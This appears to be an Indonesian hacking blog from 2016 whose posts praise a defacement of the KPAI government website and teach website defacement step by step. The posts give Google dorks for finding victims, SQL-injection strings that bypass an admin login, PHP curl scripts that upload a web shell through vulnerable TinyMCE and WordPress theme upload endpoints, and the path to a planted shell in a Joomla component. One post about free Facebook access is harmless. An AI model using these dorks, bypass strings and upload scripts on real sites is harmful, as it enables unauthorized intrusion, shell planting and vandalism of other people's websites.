Senin, 02 Mei 2016

Website Komisi Perlindungan Anak Indonesia (KPAI) Diretas




  Assalamualaikum ^_^

     Sekarang lagi heboh website Komisi Perlindungan Anak Indonesia (KPAI) diretas , website ini beralamatkan http://kpai.go.id/ , di kabarkan di retas oleh hacker yang bernama samaran Skeptix.



                                            tampilan situs komisi perlindungan anak indonesia yang di retas


website yang beralamatkan http://kpai.go.id/ pada tanggal 21/05/2016 , mengalami perubahan pada tampilan layar utama dengan tampilan latar hitam. 
  anggota hacker ini jg meninggalkan pesan yang bertuliskan "Zuhahaha.. You're drunk?Fix ur sec first b4 talking about game",yang kurang lebih berarti, perbaiki keamanan(sistem) anda dahulu sebelum berbicara tentang game. 

sampai saat ini belum ada kepastian tentang motif peretasan ini . namun ini pasti diduga sebagai protes tentang game online yang di blokir di indonesia .

Seperti kita ketahui,beberapa waktu yang lalu pemerintah sempat mengeluarkan pernyatan bahwa akan memblokir sejumlah gim daring (game online). Hal itu di perkuat oleh pernyatan Erlinda,Sekretaris Jenderal Komisi Perlindungan Anak Indonesia (KPAI) "Pemblokiran jadi salah satu cara paling membantu. Setidaknya, daripada tidak ada action sama sekali" kata Erlinda,di kutip dari republika.co.id(24/4/16).

keren juga yah hacker indonesia dalam menyigapi masalah ini . salut buat hacker indonesia . 

Wasaalamualaikum ^-^

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Kamis, 28 April 2016

Tutorial Bypass Admin MR Technology




   ^_^ Assalamualaikum ^_^ 

    Udah Lama Ngak Ngepost Tutorial Di Blog Ini . hEHEHEHE

OK Sekarang Kita lanjut ke tutor selanjutnya "Tutorial Bypass Admin MR Technology"

Lagsung aja baca artikelnya sambil praktekin :D

Dork : inurl:/apanel/index.php "Developed By MR Technology"

gunakan dork diatas dengan menggunakan searching google :D

Klau udah dapat target nanti gambarnya kyak gini :v



Kalau Gambarnya kyak gitu sisa masukin user dan passnya , lihat di bwah :

USER : ' or 1=1 limit 1 -- -+ , PASS : ' or 1=1 limit 1 -- -+

Atau bisa jg

USER : admin , PASS : admin

Ok Gan , Kalau berhasil nanti gambarnya kyak gini :D



Berhasil deh gan , wkwkwk nggak ngerti bhasanya yah :D , Sama sya jg :3

klau mau upload shell cari sendiri aja :D , Bisa itu kok upload shellnya :v

Ok gan , Gitu Aja , klau ada kurang vaham sisa komentar aja di bwah :D

Waasalamualaikum ^_^

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR



Senin, 25 April 2016

Tinymce Images File Upload Vulnerable



      Hallo Gan , skarang sya mau share tutorial "Tinymce Images File Upload Vulnerable" , tdi sya mau nge deface , ehh malah dapat vuln ginian , entah sya yg temukan atau udah keduluan ama orang lain , tpi yg pastinya lumayan lah , buat nge deface :D

Klau gitu langsung aja ke TKP

Dork : inurl:/imgupload/ fileuploader.php (kembangin lgi yah vulnya banyak kok)

CSRF Xampp :

<?php
$uploadfile="foto.jpg";
$ch = curl_init("site.com/extlib/tinymce/plugins/imgupload/fileuploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

OK klau udah punya yg diatas , langsung aja cari target di pencarian google dengan mengunakan dork diatas :v

klau udah nemu kyak gini

http://site.com/(path)/extlib/tinymce/plugins/imgupload/

Langsung aja ubah kyak gini mas mbah

http://site.com/(path)/extlib/tinymce/plugins/imgupload/fileuploader.php

Kalau vuln gambarnya kyak gini



Ok langsung aja gunakan csrf xamppnya , nanti keliatan tempat uploadnya kok



Penting : File Yang bisa di upload cuman jpg , png ( php tidak mendukung )

Ok gitu aja gan , klau ada yg kurang vaham isi aja komentar di bwah yah gan :D

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Sabtu, 23 April 2016

WordPress Smallbiz Themes Remote File Uploads Vulnerability


  

   Berjumpa lagi bersama saya Mr.3RR0R :v , skarang sya akan share tutorial "WordPress Smallbiz Themes Remote File Uploads Vulnerability"

langsung aja yah vro :v

dork : inurl:themes/smallbiz

Cari target locked nya di google menggunakan dork di atas yg vro . :v

Trus klau udah dapat contohnya kyak gini .

"Site.com/wp-content/themes/smallbiz/"

Ubah menadi

"Site.com/wp-content/themes/smallbiz/palette/index.php"

Klau gambarnya kyak gini berarti vulnerable .





Sisa pilih choose file trus upload filemu , klau udah klik tuh analize uploaded image

Klau mau ngeliat tempat filemu di mana berada , sisa klik view .

Note : file yg bisa di upload cuman bisa berextensi "png , gif , jpg , jpeg"

Ok gan gitu aja basa basi nya langsung aja praktekkan :v


Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Cara Gratis Akses Facebook Tanpa Mengurangi Kuota Internet Di Smartphone



     Assalamualaikum bro bray ^_^

Sekarang sya udah bosan nge post tutorial deface :v , sekarang sya akan membagikan tutorial "Cara Gratis Akses Facebook Tanpa Mengurangi Kuota Internet Di Smartphone"

Sebenarnya sya dapat ide dari web sebelah , jdinya sya bagikan tutorial ini :v , daripada bagiin tutor deface mulu kan bosan :v

Oke Langsung Aja Ke TKP

1) Download dan install aplikasi internet.org di smartphone  anda , atau di playstore.


2) Buka dan jalankan aplikasi internet.org nya yg tadi sudah di download

3) Pastikan anda sudah mempunyai aplikasi facebook , ingat yah bukan facebook dari web . tpi dari aplikasi .

4) Klau mau bermain facebook gratis , anda harus menjalankan facebook melalui internet.org .

contohnya kyak gini :D









Ok sisa klik aja tuh gambar facebook . selamat anda bermain facebook tanpa biaya :D





Note : Cara Ini Hanya Berlaku Pada Kartu IM3 Dan Mentari saja

Ok gitu aja gan :D , klau ada yg kurang di pahami sisa isi kolom komentar di bwah .

Waasalamualaikmun ^_^

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebppk.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Jumat, 22 April 2016

Tutorial Deface dengan WP Themes Brainstorm Arbitrary File


 

   Assalamualaikum :v

Berjumpa lgi bersama sya si tamvan Mr.3RR0R

Sekarang sya akan membahas tutorial deface dengan "Wordpress themes brainstorm"

Entah ini exploit baru atau lama , cuman nemu doang dari blog sebelah :v

ok gan langsung aja pelajari tutor di bwah ini

Dork:
inurl:/wp-content/themes/brainstorm

CSRF :

<?php

$uploadfile="shell.php";
$ch = curl_init("www.contoh.com/[path]/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

  print "$postResult";

?> 

    Pertama gunakan dork diatas di google

klau sudah bug pathnya liat di bwah

www.contoh.com/(path)/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php

klau gambarnya kyak gini , berarti vulnerable :v




Klau gambarnya kyak gitu , sisa gunakan CSRF yg diatas , gunakan xampp :v .

OK gitu aja gan , klau ada yg kurang di pahami silahkan isi komentar di bwah :D

Happy Enjoy :D

Waasalamualaikun gan :v


Source : TKJ Cyber Art

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Kamis, 21 April 2016

Tutorial Deface Dengan Com_Smartformer


 

      Assalamualaikum Vro :v

Sekarang sya akan berbagi exploit sederhana yaitu "Tutorial Deface Dengan Com_Smartformer"

kenapa sya blang sederhana , krena memang exploit ini sangat mudah di pelajari

klau nggak percaya baca artikelnya langsung di bwah

Dork : "inurl:index,php?option=com_smartformer" < kembangin lgi vro , kemungkinan web vulnya kurang :D

langsung aja cari target di google ;D , lalu pilih salah satu web

web yg vuln kyak gini nih



sisa tulis identitas asli atau palsu terserah , trus yg choose file gunakan shell km

klau udah submit , klau mau nyari teempat shell yg udah tertanam

nih : site.com/components/com_smartformer/files/shellmu.php

ok gitu aja gan , klau ada yg kurang mohon di benarkan di kolom komentar

Waasalamualaikum :D

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/